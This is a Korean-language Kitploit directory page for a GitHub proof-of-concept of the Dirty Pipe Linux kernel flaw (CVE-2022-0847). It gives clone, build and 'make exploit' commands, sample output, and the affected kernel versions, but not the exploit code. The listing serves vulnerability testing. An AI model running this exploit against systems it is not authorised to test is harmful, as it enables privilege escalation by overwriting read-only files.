Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
dirty-pipe-poc — CVE-2022-0847 개념 증명 | Kitploit
도구/GitHubGitHub/breachnix/dirty-pipe-poc
Privilege EscalationVulnerability AnalysisExploitationPenetration TestingBinary Exploitation
GitHubbreachnix/dirty-pipe-poc

dirty-pipe-poc

CVE-2022-0847 개념 증명

저장소 보기
1544년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Dirty Pipe POC

CVE-2022-0847 POC - https://dirtypipe.cm4all.com/

설명

이 익스플로잇은 CVE-2022-0847 취약점을 사용하여 읽기 전용 파일을 덮어쓰려고 시도합니다.

make exploit을 실행하면 다음을 수행합니다:

  1. read_only_file.txt를 생성합니다.
  2. dirtypipe 익스플로잇을 실행합니다.
  3. dirtypipe 익스플로잇이 작동했는지 확인합니다.

make exploit의 출력을 통해 시스템이 취약한지 확인할 수 있습니다:

root@kitploit:~
foo@bar:~$ make exploit # vulnerable
[*] Creating read_only_file.txt...
[*] Press any key to continue...
[*] Running exploit...
[*] Exploit was successful! 

foo@bar:~$ make exploit # not vulnerable
[*] Creating read_only_file.txt...
[*] Press any key to continue...
[*] Running exploit...
[!] Exploit was not successful!

사용법

root@kitploit:~
foo@bar:~$ cd /tmp # We don't need to keep these files.
foo@bar:~$ git clone https://github.com/breachnix/dirty-pipe-poc && cd dirty-pipe-poc
foo@bar:~$ make && make exploit # make & cc will need to be installed.

영향받는 시스템

이 취약점은 5.8보다 높고 5.16.11, 5.15.25 또는 5.10.102보다 낮은 모든 커널 버전에 영향을 미칩니다.
uname -sr을 실행하여 커널 버전을 확인할 수 있습니다:

root@kitploit:~
foo@bar:~$ uname -sr
Linux 5.10.0-12-amd64
도구 다운로드